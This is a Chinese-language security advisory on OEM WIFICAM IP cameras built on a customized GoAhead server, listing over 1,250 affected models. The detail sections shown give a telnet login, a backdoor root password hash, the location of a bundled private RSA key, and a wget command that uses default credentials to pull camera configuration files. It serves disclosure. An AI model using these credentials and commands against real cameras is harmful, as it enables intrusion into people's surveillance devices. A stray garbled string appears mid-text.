无线IP摄像机WIFICAM的OEM版本漏洞影响1250多个型号

产品描述

无线IP摄像机(P2P)WIFICAM是中国的一种网络摄像机,它允许用户远程操控摄像机。

2017-icam

漏洞摘要

这是由一家公司批量(OEM)生产销售的通用摄像机。无线网络摄像机(P2)WIFICAM是品牌摄像机之一。

因此,该公司把该摄像机分为不同的名称,品牌和功能出售。每个供应商的HTTP接口都是不同的,但是有着相同的漏洞。OEM供应商使用了一个自定义版本的GoAhead,在其代码中有着了易受攻击的部分。

GoAhead说GoAhead设备本身不受这些漏洞的影响,但是对GoAhead进行定制和特定开发的OEM的供应商使其出现了漏洞。

由于代码重复使用,这个漏洞存在于大量的摄像机列表(尤其是InfoLeak和RCE)中, 这些漏洞允许对具有预验证漏洞的1250+个摄像机模型执行根命令。

漏洞摘要:

  1. 后门帐户
  2. RSA密钥和证书
  3. Pre-Auth Info自定义http服务器中的泄漏(凭据)
  4. 以root身份验证的RCE
  5. 作为root预认证RCE
  6. 其他 – 无认证的流
  7.  综合 – “云”(Aka Botnet)

由于漏洞影响列表过长,若不想看完整列表的,可点击上面的漏洞摘要。

我们的测试表明,这个漏洞至少影响1250多个摄像机型号,主要是摄像机上运行的自定义http服务器中的InfoLeak代码大部分都是相同。它可以用于以root身份执行RCE。因此,这些摄像机很可能受到作为根的预身份验证RCE的影响:

3G+IPCam Other
3SVISION Other
3com CASA
3com Other
3xLogic Other
3xLogic Radio
4UCAM Other
4XEM Other
555 Other
7Links 3677
7Links 3677-675
7Links 3720-675
7Links 3720-919
7Links IP-Cam-in
7Links IP-Wi-Fi
7Links IPC-760HD
7Links IPC-770HD
7Links Incam
7Links Other
7Links PX-3615-675
7Links PX-3671-675
7Links PX-3720-675
7Links PX3309
7Links PX3615
7Links ipc-720
7Links px-3675
7Links px-3719-675
7Links px-3720-675
A4Tech Other
ABS Other
ADT RC8021W
AGUILERA AQUILERA
AJT AJT-019129-BBCEF
ALinking ALC
ALinking Other
ALinking dax
AMC Other
ANRAN ip180
APKLINK Other
AQUILA AV-IPE03
AQUILA AV-IPE04
AVACOM 5060
AVACOM 5980
AVACOM H5060W
AVACOM NEW
AVACOM Other
AVACOM h5060w
AVACOM h5080w
Acromedia IN-010
Acromedia Other
Advance Other
Advanced+home lc-1140
Aeoss J6358
Aetos 400w
Agasio A500W
Agasio A502W
Agasio A512
Agasio A533W
Agasio A602W
Agasio A603W
Agasio Other
AirLink Other
Airmobi HSC321
Airsight Other
Airsight X10
Airsight X34A
Airsight X36A
Airsight XC39A
Airsight XX34A
Airsight XX36A
Airsight XX40A
Airsight XX60A
Airsight x10
Airsight x10Airsight
Airsight xc36a
Airsight xc49a
Airsight xx39A
Airsight xx40a
Airsight xx49a
Airsight xx51A
Airsight xx51a
Airsight xx52a
Airsight xx59a
Airsight xx60a
Akai AK7400
Akai SP-T03WP
Alecto 150
Alecto Atheros
Alecto DVC-125IP
Alecto DVC-150-IP
Alecto DVC-1601
Alecto DVC-215IP
Alecto DVC-255-IP
Alecto dv150
Alecto dvc-150ip
Alfa 0002HD
Alfa Other
Allnet 2213
Allnet ALL2212
Allnet ALL2213
Amovision Other
Android+IP+cam IPwebcam
Anjiel ip-sd-sh13d
Apexis AH9063CW
Apexis APM-H803-WS
Apexis APM-H804-WS
Apexis APM-J011
Apexis APM-J011-Richard
Apexis APM-J011-WS
Apexis APM-J012
Apexis APM-J012-WS
Apexis APM-J0233
Apexis APM-J8015-WS
Apexis GENERIC
Apexis H
Apexis HD
Apexis J
Apexis Other
Apexis PIPCAM8
Apexis Pyle
Apexis XF-IP49
Apexis apexis
Apexis apm-
Apexis dealextreme
Aquila+Vizion Other
Area51 Other
ArmorView Other
Asagio A622W
Asagio Other
Asgari 720U
Asgari Other
Asgari PTG2
Asgari UIR-G2
Atheros ar9285
AvantGarde SUMPPLE
Axis 1054
Axis 241S
B-Qtech Other
B-Series B-1
BRAUN HD-560
BRAUN HD505
Beaulieu Other
Bionics Other
Bionics ROBOCAM
Bionics Robocam
Bionics T6892WP
Bionics t6892wp
Black+Label B2601
Bravolink Other
Breno Other
CDR+king APM-J011-WS
CDR+king Other
CDR+king SEC-015-C
CDR+king SEC-016-NE
CDR+king SEC-028-NE
CDR+king SEC-029-NE
CDR+king SEC-039-NE
CDR+king sec-016-ne
CDXX Other
CDXXcamera Any
CP+PLUS CP-EPK-HC10L1
CPTCAM Other
Camscam JWEV-372869-BCBAB
Casa Other
Cengiz Other
Chinavasion Gunnie
Chinavasion H30
Chinavasion IP611W
Chinavasion Other
Chinavasion ip609aw
Chinavasion ip611w
Cloud MV1
Cloud Other
CnM IP103
CnM Other
CnM sec-ip-cam
Compro NC150/420/500
Comtac CS2
Comtac CS9267
Conceptronic CIPCAM720PTIWL
Conceptronic cipcamptiwl
Cybernova Other
Cybernova WIP604
Cybernova WIP604MW
D-Link DCS-910
D-Link DCS-930L
D-Link L-series
D-Link Other
DB+Power 003arfu
DB+Power DBPOWER
DB+Power ERIK
DB+Power HC-WV06
DB+Power HD011P
DB+Power HD012P
DB+Power HD015P
DB+Power L-615W
DB+Power LA040
DB+Power Other
DB+Power Other2
DB+Power VA-033K
DB+Power VA0038K
DB+Power VA003K+
DB+Power VA0044_M
DB+Power VA033K
DB+Power VA033K+
DB+Power VA035K
DB+Power VA036K
DB+Power VA038
DB+Power VA038k
DB+Power VA039K
DB+Power VA039K-Test
DB+Power VA040
DB+Power VA390k
DB+Power b
DB+Power b-series
DB+Power extcams
DB+Power eye
DB+Power kiskFirstCam
DB+Power va033k
DB+Power va039k
DB+Power wifi
DBB IP607W
DEVICECLIENTQ CNB
DKSEG Other
DNT CamDoo
DVR DVR
DVS-IP-CAM Other
DVS-IP-CAM Outdoor/IR
Dagro DAGRO-003368-JLWYX
Dagro Other
Dericam H216W
Dericam H502W
Dericam M01W
Dericam M2/6/8
Dericam M502W
Dericam M601W
Dericam M801W
Dericam Other
Digix Other
Digoo BB-M2
Digoo MM==BB-M2
Digoo bb-m2
Dinon 8673
Dinon 8675
Dinon SEGEV-105
Dinon segev-103
Dome Other
Drilling+machines Other
E-Lock 1000
ENSIDIO IP102W
EOpen Open730
EST ES-IP602IW
EST IP743W
EST Other
EZCam EPK-EP10L1
EZCam EZCam
EZCam Other
EZCam PAN/TILT
EZCam Pan/Tilt
EasyCam EC-101HD
EasyCam EC-101HDSD
EasyCam EC-101SD
EasyCam EC-102
EasyCam Other
EasyN 187
EasyN 1BF
EasyN 720P
EasyN F
EasyN F-136
EasyN F-M136
EasyN F-M166
EasyN F-M181
EasyN F-M1b1
EasyN F-SERIES
EasyN F133
EasyN F2-611B
EasyN F3
EasyN F3-166
EasyN F3-176M
EasyN F3-M166
EasyN F3-SERIES
EasyN F3-Series
EasyN F3-m187
EasyN F3M187
EasyN FS-613A-M136
EasyN FS-613B
EasyN FS-613B-M166
EasyN FS-613B-MJPEG
EasyN FS613
EasyN F_M10R
EasyN H3-V10R
EasyN H6-M137h
EasyN M091
EasyN Other
EasyN est-007660-611b
EasyN est-007660333
EasyN f
EasyN f-Series
EasyN f138
EasyN f_series
EasyN fseries
EasyN kitch
EasyN s
EasySE F/B/N/I
EasySE H3
EasySE H3e
EasySE Other
Ebode IPV38W
Ebode IPV58
Ebode Other
Ego Other
Elro 901
Elro 903
Elro 903IP
Elro C7031P
Elro C703IP2
Elro C704-IP
Elro C704IP
Elro C704IP.2
Elro C704ip
Elro C803IP
Elro C903IP
Elro C903IP.2
Elro C904IP
Elro C904IP.2
Elro IP901
Elro Other
Eminent 6564
Eminent EM6220
Eminent EM6564
Eminent em6220
Esky C5900
Esky L
Esky Live
Esky c5900
Eura-Tech IC-03C3
EyeCam ICAM-608
EyeCam IP65IW
EyeCam Other
EyeCam STORAGEOPTIONS
EyeIPCam IP901W
EyeSight ES-IP607W
EyeSight ES-IP811W
EyeSight ES-IP909IW
EyeSight ES-IP935FW
EyeSight ES-IP935IW
EyeSight IP910IW
EyeSight IP915IW
EyeSight Other
EyeSight ip609IW
EyeSight ip909iw
EyeSight ip915iw
EyeSight mjpeg
EyeSpy247 Other
F-Series FSERIES
F-Series Ip
F-Series Other
F-Series ip
First+Concept Other
Focuscam F19821W
Foscam FI18904w
Foscam FI18905E
Foscam FI18905W
Foscam FI18906w
Foscam FI1890W
Foscam FI18910E
Foscam FI18910W
Foscam FI18910w
Foscam FI18916W
Foscam FI18918W
Foscam FI18919W
Foscam FI19810W
Foscam FI8094W
Foscam FI81904W
Foscam FI8601W
Foscam FI8602W
Foscam FI8606W
Foscam FI8610w
Foscam FI8903W
Foscam FI8903W_Elita
Foscam FI8904
Foscam FI8904W
Foscam FI8905E
Foscam FI8905W
Foscam FI8905w
Foscam FI8906w
Foscam FI8907W
Foscam FI8908W
Foscam FI8909W
Foscam FI890W
Foscam FI8910
Foscam FI8910E
Foscam FI8910W
Foscam FI8910W_DW
Foscam FI8910w
Foscam FI8916W
Foscam FI8918
Foscam FI89180w
Foscam FI8918E
Foscam FI8918W
Foscam FI8918w
Foscam FI8919W
Foscam FI9804W
Foscam FI9805E
Foscam FI9810
Foscam FI9810W
Foscam FI9818
Foscam FI9820w
Foscam FI9821W
Foscam FI9821w
Foscam FL8910
Foscam FS18908W
Foscam FS8910
Foscam Fi8910
Foscam Other
Foscam fI8989w
Foscam fi1890w
Foscam fl8910w
FoxCam PTZ2084-L
GIGA gb
GT+ROAD HS-006344-SPSLM
General Other
Generic All-in-one
Generic Billy
Generic DomeA-Outdoor
Generic IP
Generic Other
Gi-star+srl IP6031W
Gigaeye GB
GoAhead EC-101SD
GoAhead GoAheadWebs
GoAhead IPCAM1
GoAhead IPCAM2
GoAhead Other
GoAhead thedon
GoCam Other
Goclever EYE
Goclever EYE2
Gotake GTK-TH01B
H+264+network+DVR 720p
H+264+network+DVR Other
H.264 Other
H6837WI Other
HD+IPC Other
HD+IPC SV3C
HDIPCAM Other
Heden CAMH04IPWE
Heden CAMHED02IPW
Heden CAMHED04IP
Heden CAMHED04IPWN
Heden CAMHEDIPWP
Heden Other
Heden VisionCam
Heden visionCam
HiSilicon Other
Hikvision DS-2CD2132
Histream RTSP
HooToo F-SERIES
HooToo HOOTOO
HooToo HT-IP006
HooToo HT-IP006N
HooToo HT-IP009HDP
HooToo HT-IP206
HooToo HT-IP207F
HooToo HT-IP210HDP
HooToo HT-IP210P
HooToo HT-IP212
HooToo IP009HDP
HooToo Other
HooToo apm-h803-mpc
Hsmartlink Other
Hungtek WIFI
ICAMView Other
ICam I908W
ICam IP-1
ICam Other
ICam Other2
ICam dome
INISOFT-CAM Stan
INSTAR 4010
INVID Other
IO+Data Other
IP66 Other
IPC IPC02
IPC Other
IPC S5030-TF
IPC S5030-m
IPC SRICAM
IPCC 3XPTZ
IPCC 7210W
IPCC IPCC-7210W
IPCC x01
IPTeles Other
IPUX ip-100
ISIT Other
IZOtech Other
IZTOUCH 0009
IZTOUCH A001
IZTOUCH IZ-009
IZTOUCH LTH-A8645-c15
IZTOUCH Other
IZTOUCH Other1
IZTOUCH ap001
IeGeek Other
IeGeek ukn
Inkovideo V-104
Iprobot3 Other
JRECam JM3866W
JWcam JWEV
JWcam Other
Jaycar 3834
Jaycar 720P
Jaycar Other
Jaycar QC-3831
Jaycar QC-3832
Jaycar QC-3834
Jaycar QC-3836
Jaycar QC-3839
Jaytech IP6021W
JhempCAM Back
JhempCAM Other
KaiKong 1601
KaiKong 1602w
KaiKong Other
KaiKong SIP
KaiKong SIP1602
KaiKong SIP1602W
KaiKong sip
KaiKong sip1602w
Kenton gjc02
Kinson C720PWIP
Klok Other
Knewmart KW01B
Knewmart KW02B
Kogan KAIPC01BLKA
Kogan KAIPCO1BLKA
Kogan Other
Kogan encoder
Kogan kaipc01blkb
Kompernass IUK
Koolertron Other
Koolertron PnP
Koolertron SP-SHEX21-SL
LC+security Other
LW lw-h264tf
LYD H1385H
Lager Other
Leadtek C351
LevelOne 1010/2010
Libor Other
LifeTech MyLifeTech
LifeTech Other
LifeTech dd
Lilly Other
Linq Other
Lloyds 1107
Loftek CXS
Loftek Nexus
Loftek Other
Loftek SPECTOR
Loftek Sendinel
Loftek Sentinel
LogiLink WC0030A
LogiLink wc0044
Logitech C920
MCL 610
MJPEG Other
Maginon 100
Maginon 10AC
Maginon 20C
Maginon IP-20c
Maginon IPC
Maginon IPC-1
Maginon IPC-10
Maginon IPC-100
Maginon IPC-100AC
Maginon IPC-10AC
Maginon IPC-2
Maginon IPC-20
Maginon IPC20C
Maginon IPC_1A
Maginon Other
Maginon SUPRA
Maginon Supra
Maginon ipc
Maginon ipc-1a
Maginon ipc100a
Maginon ipx
Maginon w2
Marmitek GM-8126
Maygion IP
Maygion OTHER2
Maygion Other
Maygion V3
Maygion black
Mediatech mt4050
Medisana SmartBabyMonitor
Merlin IP
Merlin Other
Merlin vstc
Messoa Other
Mingyoushi S6203Y-WR
Momentum 2002
Momentum MO-CAM
NEXCOM S-CAM
NIP NIP-004500-KMTLU
NIP NIP-075007-UPHTF
NIP NIP-11BGPW
NIP NIP-14
NTSE Other
Neewer Other
Neewer V-100
Neo+CoolCam NIP
Neo+CoolCam NIP-02(OAM)
Neo+CoolCam NIP-06
Neo+CoolCam NIP-066777-BWESL
Neo+CoolCam NIP-102428-DFBEF
Neo+CoolCam NIP-H20(OZX)
Neo+CoolCam OBJ-007260-LYLDU
Neo+CoolCam Other
Neo+CoolCam neo
Neo+CoolCam nip-11
Neo+CoolCam nip-20
Ness Other
NetView Other
Netcam Dual-HD
Netcam HSL-232245-CWXES
Netcam OUVIS
Netcam Other
Netware Other
Nexxt+Solution Xpy
Nixzen Other
NorthQ NQ-9006
Office+One CM-I11123BK
Office+One IP-900
Office+One IP-99
Office+One Other
Office+One SC-10IP
Office+One ip-900
Office+One ip900
Opexia OPCS
Optica+Video FI-8903W
Optica+Video FI-8918W
Optica+Video Other
Otto 4eye
Overmax CamSpot
Overmax Camspot
OwlCam CP-6M201W
P2p wificam
PCS Other
Panasonic BL-C131A
PeopleFu IPC-674
PeopleFu IPCAM1
PeopleFu IPCAM2
PeopleFu IPCAM3
PeopleFu IPCAM5
Pixpo 1Z074A2A0301627785
Pixpo PIX006428BFYZY
Pixpo PIX009491MLJYM
Pixpo PIX009495HURFE
Pixpo PIX010584DFACE
Plaisio IP
Planex Other
Planex PLANEX
Polariod P351S
Polaroid IP-100
Polaroid IP-101W
Polaroid IP-200B
Polaroid IP-201B
Polaroid IP-350
Polaroid IP-351S
Polaroid IP-360S
Polaroid IP-810W
Polaroid IP-810WZ
Polaroid Other
Polaroid POLIP101W
Polaroid POLIP201B
Polaroid POLIP201W
Polaroid POLIP351S
Polaroid POLIP35i5
PowerLead Caue
PowerLead PC012
ProveCam IP2521
Provision 717
Provision F-717
Provision F-737
Provision PT-737
Provision WP-711
Provision WP-717P
Pyle HD
Pyle HD22
Pyle HD46
Pyle Mine
Pyle PIPCAM15
Pyle Pipcam12
Pyle cam5
Pyle pipcam25
Pyle pipcam5
Q-nest QN-100S
Q-nest qn-100s
Queback 720p
ROCAM NC-400
ROCAM NC-500
ROCAM NC300
ROCAM NC300-1
ROHS IP
ROHS none
RTX 06R
RTX DVS
RTX IP-06R
RTX IP-26H
RTX Other
Rollei safetycam-10hd
SES Other
SKJM Other
SST SST-CNS-BUI18
SVB+International SIP-018262-RYERR
SafeHome 278042
SafeHome 616-W
SafeHome IP601W-hd
SafeHome Other
SafeHome VGA
SafeHome iprobot
Samsung Other
Santec-Video Other
Sarotech IPCAM-1000
Sarotech ip300
Scricam 004
Scricam 192.168.1.7
Scricam AP-004
Scricam AP-009
Scricam AP0006
Scricam AP006
Secam+CCTV IPCAM
Secam+CCTV Other
Seculink 10709
Seculink Other
Secur+Eye xxc5330
Seisa JK-H616WS
Senao PTZ-01H
Sequrecam Other
Sequrecam PNP-125
Sercomm Other
Shenwhen+Neo+Electronic+Co NC-541
Shenwhen+Neo+Electronic+Co Other
Shenwhen+Neo+Electronic+Co X-5000B
Shenzhen 720P
Shixin+China IP-129HW
Siepem IPC
Siepem S5001Y-BW
Siepem S6203y
Siepem S6211Y-WR
Simi+IP+Camera+Viewer Other
Sineoji Other
Sineoji PT-315V
Sineoji PT-3215P
Sineoji PT-325IP
Sinocam Other
Sky+Genious Genious
Skytronic IP
Skytronic IP99
Skytronic Other
Skytronic WiFi
Skytronic dome
SmartEye Other
SmartWares C723IP
SmartWares c724ip
SmartWares c923ip
SmartWares c924ip
Solwise SEC-1002W-IR
Spy+Cameras WF-100PCX
Spy+Cameras WF-110V
Sricam 0001
Sricam 004
Sricam A0009
Sricam A001
Sricam AP-001
Sricam AP-003
Sricam AP-004
Sricam AP-005
Sricam AP-006
Sricam AP-009
Sricam AP-012
Sricam AP-CAM
Sricam AP0009
Sricam AP002
Sricam AP995
Sricam Cam1
Sricam Front
Sricam Home
Sricam Other
Sricam SP005
Sricam SP012
Sricam SP013
Sricam SP015
Sricam SRICAM
Sricam SRICAM1
Sricam aj-c2wa-c118
Sricam ap
Sricam ap006
Sricam ap1
Sricam h.264
Sricam sp013
Sricctv A-0006
Sricctv A-009
Sricctv AJ-006
Sricctv AP-0001
Sricctv AP-0005
Sricctv AP-0009
Sricctv AP-001
Sricctv AP-002
Sricctv AP-003
Sricctv AP-004
Sricctv AP-004AF
Sricctv AP-005
Sricctv AP-006
Sricctv AP-007
Sricctv AP-008
Sricctv AP-009
Sricctv AP-011
Sricctv AP-014
Sricctv H-264
Sricctv Other
Sricctv P2P-BLACK
Sricctv P2P-Black
Sricctv SP-007
Sricctv SR-001
Sricctv SR-004
Star+Vedia 6836
Star+Vedia 7837-WIP
Star+Vedia C-7835WIP
Star+Vedia Other
Star+Vedia T-6836WTP
Star+Vedia T-7833WIP
Star+Vedia T-7837WIP
Star+Vedia T-7838WIP
StarCam C33-X4
StarCam EY4
StarCam F6836W
StarCam Other
StarCam c7837wip
Stipelectronics Other
Storage+Options HOMEGUARD
Storage+Options Other
Storage+Options SON-IPC1
Sumpple 610
Sumpple 610S
Sumpple 631
Sumpple 960P
Sumpple S601
Sumpple S610
Sumpple S631
Sumpple S651
Sumpple qd300
Sumpple s631
SunVision+US Other
Sunbio Other
Suneyes Other
Suneyes SP-T01EWP
Suneyes SP-T01WP
Suneyes SP-TM01EWP
Suneyes SP-TM01WP
Suneyes SP-tm05wp
Sunluxy H-264
Sunluxy HZCam
Sunluxy Other
Sunluxy PTZ
Sunluxy SL-701
Supra+Space IPC
Supra+Space IPC-1
Supra+Space IPC-100AC
Supra+Space IPC-10AC
Supra+Space Other11
Supra+Space ipc-20c
Sure-Eye Other
Surecom LN-400
Swann 005FTCD
Swann 440
Swann 440-IPC
Swann ADS-440
Swann ADS-440-PTZ
Swann ADS-CAMAX1
Swann Other
Swann SWADS-440-IPC
Swann SWADS-440IPC-AU
Sygonix 43176A
Sygonix 43558A
Szneo CAM0X
Szneo CoolCam
Szneo NIP
Szneo NIP-0
Szneo NIP-02
Szneo NIP-031
Szneo NIP-031H
Szneo NIP-06
Szneo NIP-12
Szneo NIP-2
Szneo NIP-20
Szneo NIP-210485-ABABC
Szneo NIP-26
Szneo NIP-X
Szneo NP-254095
Szneo Other
Szneo TFD
TAS-Tech Other
Technaxx tx-23
Techview GM8126
Techview QC-3638
Techview qc3839
Temvis Other
Tenda C50S
Tenda c30
Tenda c5+
Tenvis 0012
Tenvis 3815
Tenvis 3815-W
Tenvis 3815W
Tenvis 3815W.
Tenvis 3815W2013
Tenvis IP-319W
Tenvis IP-319w
Tenvis IP-391W
Tenvis IP-391WHD
Tenvis IP-602W
Tenvis IP602W
Tenvis IPROBOT
Tenvis JP-3815W
Tenvis JPT-3814WP2P
Tenvis JPT-3815
Tenvis JPT-3815-P2P
Tenvis JPT-3815W
Tenvis JPT-3815W+
Tenvis JPT-3815WP2P
Tenvis JPT-3815w
Tenvis JPT-3818
Tenvis MINI-319W
Tenvis Mini-319
Tenvis Other
Tenvis PT-7131W
Tenvis TH-661
Tenvis TR-3818
Tenvis TR-3828
Tenvis TR3815W
Tenvis TZ100
Tenvis TZ100/IPROBOT3
Tenvus JPG3815W
Threeboy IP-660
Topcam SL-30IPC01Z
Topcam SL-720IPC02Z
Topcam SL-910IW30
Topica+CCTV Other
Trivision NC-335PW-HD-10
Trust NW-7500
Turbo+X Endurance
Turbo+X IIPC-20
Uokoo 720P
VCatch Other
VCatch VC-MIC720HK
Valtronics IP
Valtronics Other
Vandesc IP900
Vantech Other
Vantech PTZ
Videosec+Security IPC-103
Videosec+Security IPP-105
Vimicro Other
Vitek+CCTV Other
Vstarcam 7823
Vstarcam C-7824WIP
Vstarcam C-7833WIP-X4
Vstarcam C-7833wip
Vstarcam C-7837WIP
Vstarcam C-7838WIP
Vstarcam C50S
Vstarcam C7816W
Vstarcam C7824WIP
Vstarcam C782WIP
Vstarcam C7842WIP
Vstarcam C93
Vstarcam C=7824WIP
Vstarcam Cam360
Vstarcam F-6836W
Vstarcam H-6837WI
Vstarcam H-6837WIP
Vstarcam H-6850
Vstarcam H-6850WIP
Vstarcam H-6850wip
Vstarcam ICAM-608
Vstarcam Other
Vstarcam T-6835WIP
Vstarcam T-6836WTP
Vstarcam T-6892wp
Vstarcam T-7815WIP
Vstarcam T-7833WIP
Vstarcam T-7833wip
Vstarcam T-7837WIP
Vstarcam T-7838WIP
Vstarcam T-7892WIP
Vstarcam T6836WTP
Vstarcam T7837WIP
Vstarcam c7815wip
Vstarcam c7833wip
Vstarcam c7850wip
Wanscam 00D6FB01980F
Wanscam 106B
Wanscam 118
Wanscam 541-W
Wanscam 543-W
Wanscam 790
Wanscam AJ-C0WA-198
Wanscam AJ-C0WA-B106
Wanscam AJ-C0WA-B116
Wanscam AJ-C0WA-B168
Wanscam AJ-C0WA-B1D8
Wanscam AJ-C0WA-C0D8
Wanscam AJ-C0WA-C116
Wanscam AJ-C0WA-C126
Wanscam AJ-C2WA-B118
Wanscam AJ-C2WA-C116
Wanscam AJ-C2WA-C118
Wanscam AJ-C2WA-C198
Wanscam AJ-COWA-B1D8
Wanscam AJ-COWA-C116
Wanscam AJ-COWA-C126
Wanscam AJ-COWA-C128
Wanscam AW00004J
Wanscam B1D8-1
Wanscam C-118
Wanscam C-126
Wanscam Colour
Wanscam FI-18904w
Wanscam FR-4020A2
Wanscam FR4020A2
Wanscam HD-100W
Wanscam HW-0021
Wanscam HW-0022
Wanscam HW-0022HD
Wanscam HW-0023
Wanscam HW-0024
Wanscam HW-0025
Wanscam HW-0026
Wanscam HW-0028
Wanscam HW-0033
Wanscam HW-0036
Wanscam HW-0038
Wanscam HW-0039
Wanscam HW-22
Wanscam HW0030
Wanscam IP
Wanscam JW-0001
Wanscam JW-0003
Wanscam JW-0004
Wanscam JW-0004m
Wanscam JW-0005
Wanscam JW-0006
Wanscam JW-0008
Wanscam JW-0009
Wanscam JW-0010
Wanscam JW-0011
Wanscam JW-0011l
Wanscam JW-0012
Wanscam JW-0018
Wanscam JW-004
Wanscam JW-009
Wanscam JW-CD
Wanscam JW000008
Wanscam JW0009
Wanscam JW001
Wanscam JW0012
Wanscam JW008
Wanscam JWEV
Wanscam JWEV-011777-NSRVV
Wanscam JWEV-011921-RXSXT
Wanscam JWEV-360171-BBEAC
Wanscam JWEV-380096-CECDB
Wanscam JWEV-PEPLOW
Wanscam NBC-543W
Wanscam NC-530
Wanscam NC-541
Wanscam NC-541/W
Wanscam NC-541W
Wanscam NC-541w
Wanscam NC-543W
Wanscam NCB-534W
Wanscam NCB-540W
Wanscam NCB-541W
Wanscam NCB-541WB
Wanscam NCB-543W
Wanscam NCBL-618W
Wanscam NCH-532MW
Wanscam NCL-610W
Wanscam NCL-612W
Wanscam NCL-616W
Wanscam NCL-S616W
Wanscam Other
Wanscam TG-002
Wanscam WJ-0004
Wanscam WX-617
Wanscam Works
Wanscam XHA-120903181
Wanscam XHA-4020a2
Wanscam __PTZ
Wanscam chiOthernese
Wanscam ip
Wanscam jw0005
Wanscam jw0010
Wansview 541
Wansview 625W
Wansview MCM-627
Wansview N540w
Wansview NCB-534W
Wansview NCB-541W
Wansview NCB-541w
Wansview NCB-543W
Wansview NCB541W
Wansview NCB545W
Wansview NCL-610W
Wansview NCL610D04
Wansview NCL614W
Wansview Other
Wansview dcs543w
Wansview nc543w
Wardmay+CCTV WDM-6702AL
Watch+bot+Camera resup
WebcamXP Other
WinBook Other
WinBook T-6835
WinBook T-6835WIP
WinBook T-7838
Winic NVT-530004
Wise+Group Other
X-Price Other
X10 39A
X10 AIRSIGHT
X10 AirSight
X10 Airsight
X10 Jake
X10 Other
X10 XC-38A
X10 XX-36A
X10 XX-39A
X10 XX-56A
X10 XX-59A
X10 XX-60
X10 XX-69A
X10 XX41Ahome
XVision Other
XXCamera 53100
XXCamera 5330-E
XXCamera Other
XXCamera XXC-000723-NJFJD
XXCamera XXC-092411-DCAFC
XXCamera XXC-50100-H
XXCamera XXC-50100-T
XXCamera XXC-5030-E
XXCamera XXC-53100-T
XXCamera XXC52130
Xin+Ling Other
Yawcam Other
Zilink Other
Zmodo CMI-11123BK
Zmodo IP-900
Zmodo Other
Zodiac+Security 909
Zodiac+Security Other
Zoneway NC638MW-P
ZyXEL Other
alexim Other
alexim cam22822
alias Other
all+in+one+ Other
all+in+one+ b1
all-in-one Other
allecto DVC-150IP
apc Other
asw-006 Other
boh l
bravo Other
bush+plus BU-300WF
ccam p2p
china 8904W
china HDIPCAM
china IPCAM
china Other
china PTZCAM
china np-02
ciana+exports antani
cina Other
coolead L
coolead L610WS
dax Other
denver IPC-320
denver IPO-320
e-landing 720p
eScam QF100
ebw Other
epexis PIPCAMHD82
epexis pipcam5
esecure nvp
geeya C602
geeya P2P
geeya c801
hdcam Other
homeguard 720P
homeguard Other
homeguard Wireless
homeguard wifi
iView ID002A
iView Other
insteon 75790
insteon 75790wh
insteon High
insteon Other
insteon Wireless
iuk 5A1
ivision hdwificam
iwitness bullet
jwt Other
jyacam JYA8010
kadymay KDM-6800
kadymay KDM6702
kadymay KMD-6800
kadymay Other
kang+xun xxc5030-t
kines Other
kiocong 1601
kiocong 1602
kiocong 1609
kiocong Other
kodak 201pl
koicong 1601
l+series CAM0758
l+series CAM0760
l+series Other
l+series V100
logan n8504hh
meyetech 095475-caeca
meyetech 188091-EFBAE
meyetech Other
meyetech WirelessCam
micasaverde VistaCamSD
pipcam HD17
pni 941w
pni IP451W
pni IP541W
pni IP941W
pni IP951W
pni Other
pnp IP
pnp Other
semac Other
skylink WC-300PS
storex D-10H

shodan列出了195,368个可以被攻击的摄像机

IWYCQ{M0CFZNBX~P59Y%2}F

详细信息 – 后门帐户

默认情况下,摄像机的telnetd是运行的。

user@kali$ telnet 192.168.1.107
Trying 192.168.1.107...
Connected to 192.168.1.107.
Escape character is '^]'.

apk-link login: admin
Password:

telnet> q
Connection closed.
user@kali$

摄像机中有一个后门帐户:

root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

详细信息 – RSA密钥和证书

/system/www/pem/ck.pem具有专用RSA密钥的Apple证书:

/ # cat /system/www/pem/ck.pem 
Bag Attributes
 friendlyName: Apple Production IOS Push Services: com.app.camera
 localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D 
subject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US
issuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
Bag Attributes
 friendlyName: andrew
 localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D 
Key Attributes: <No Attributes>
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----

详细信息 – Pre-Auth Info自定义http服务器中的泄漏(凭据)

HTTP接口由自定义的HTTP服务器提供。这个HTTP服务器实际上基于GoAhead,并且由相机的OEM供应商修改(导致列出的漏洞)。它允许2种认证:

  • htdigest认证
  • 使用URI(?loginuse=LOGIN&?loginpas=PASS)中的凭据进行身份验证。

默认情况下,Web目录包含指向symbolic链接的配置文件(system.inisystem-b.ini包含凭据):

/tmp/web # ls -la *ini
lrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini
lrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini
/tmp/web #

使用有效的凭据,攻击者可以检索配置,如下所示:

user@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd

[...]
000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X
00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis
00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........
00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
